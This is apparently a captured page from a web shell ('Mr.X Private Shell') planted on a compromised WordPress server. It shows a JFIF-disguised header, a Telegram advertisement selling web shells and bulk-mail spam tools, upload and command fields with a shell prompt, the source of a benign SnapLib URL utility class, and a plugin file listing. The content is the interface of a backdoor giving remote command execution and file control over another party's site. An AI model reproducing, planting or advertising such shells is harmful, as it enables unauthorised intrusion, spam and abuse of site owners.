����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

chassiw@216.73.217.25: ~ $
<?php

if(!class_exists('SnapLibURLU')) {
	return;
}

/**
 * Utility class used for working with URLs
 *
 * Standard: PSR-2
 * @link http://www.php-fig.org/psr/psr-2
 *
 * @package SnapLib
 * @copyright (c) 2017, Snapcreek LLC
 * @license	https://opensource.org/licenses/GPL-3.0 GNU Public License
 *
 */
class SnapLibURLU
{

	/**
     * Append a new query value to the end of a URL
     *
     * @param string $url   The URL to append the new value to
     * @param string $key   The new key name
     * @param string $value The new key name value
     *
     * @return string Returns the new URL with with the query string name and value
     */
    public static function appendQueryValue($url, $key, $value)
    {
        $separator = (parse_url($url, PHP_URL_QUERY) == NULL) ? '?' : '&';
        $modified_url = $url."$separator$key=$value";

        return $modified_url;
    }

	/*
	 * Fetches current URL via php
	 *
	 * @param bool $queryString If true the query string will also be returned.
	 *
	 * @returns The current page url
	 */
    public static function getCurrentUrl($queryString = true) {
		$protocol = 'http';
		if ($_SERVER['SERVER_PORT'] == 443 || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on')) {
			$protocol .= 's';
			$protocolPort = $_SERVER['SERVER_PORT'];
		} else {
			$protocolPort = 80;
		}
		$host = $_SERVER['HTTP_HOST'];
		$port = $_SERVER['SERVER_PORT'];
		$request = $_SERVER['PHP_SELF'];

		$query = ($queryString === TRUE) ? $_SERVER['QUERY_STRING'] : "";
		$url = $protocol . '://' . $host . ($port == $protocolPort ? '' : ':' . $port) . $request . (empty($query) ? '' : '?' . $query);
		return $url;
	}

	/*
	 * Check to see if the URL is valid
	 *
	 *  @param string $url		A URL e.g without prefix "ajax.googleapis.com"
	 *  @param string $port		A valid port number
	 *
	 *  @returns True if http content exists
	 */
	public static function urlExists($url = '', $port, $timeout = 5)
    {

		if (function_exists('curl_version'))
		{
			// Stip is not
			if(empty($url) && !is_string($url))
				return false;

			$return = true;
			$curl = curl_init($url);
			//don't fetch the actual page, you only want to check the connection is ok
			curl_setopt($curl, CURLOPT_NOBODY, true);
			curl_setopt($curl, CURLOPT_CONNECTTIMEOUT ,$timeout);
			curl_setopt($curl, CURLOPT_TIMEOUT , $timeout);
			$result = curl_exec($curl);

			//if request did not fail
			if ($result !== false) {
				//if request was ok, check response code
				$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
				$return = ((int)$statusCode === 404);
			}
			
			curl_close($curl);
			return (!$return);
		}
		
		
		if (function_exists('fsockopen')) {
			$port		 = isset($port) && is_integer($port) ? $port : 80;
			$connected	 = @fsockopen($url, $port, $errno, $errstr, $timeout); //website and port
			if ($connected) {
				$is_conn = true;
				@fclose($connected);
			} else {
				$is_conn = false;
			}
			return $is_conn;
		}

		return false;
    }
	

}

Filemanager

Name Type Size Permission Actions
class.snaplib.logger.php File 2.92 KB 0644
class.snaplib.u.io.php File 9.31 KB 0644
class.snaplib.u.net.php File 1.52 KB 0644
class.snaplib.u.os.php File 479 B 0644
class.snaplib.u.stream.php File 537 B 0644
class.snaplib.u.string.php File 1.87 KB 0644
class.snaplib.u.ui.php File 765 B 0644
class.snaplib.u.url.php File 3.03 KB 0644
class.snaplib.u.util.php File 5.3 KB 0644
index.php File 15 B 0644
snaplib.all.php File 559 B 0644